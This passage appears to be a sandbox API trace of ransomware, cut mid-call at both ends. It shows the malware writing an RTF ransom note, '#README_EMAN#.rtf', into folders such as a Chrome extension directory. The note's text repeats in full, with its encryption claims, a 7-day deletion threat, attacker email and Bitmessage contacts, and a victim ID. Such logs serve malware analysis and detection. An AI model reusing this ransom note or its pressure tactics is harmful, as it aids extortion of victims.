n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.177] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.178] CloseHandle (hObject=0x2ec) returned 1 [0291.178] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\#readme_eman#.rtf")) returned 0xffffffff [0291.178] GetLastError () returned 0x2 [0291.178] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.179] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 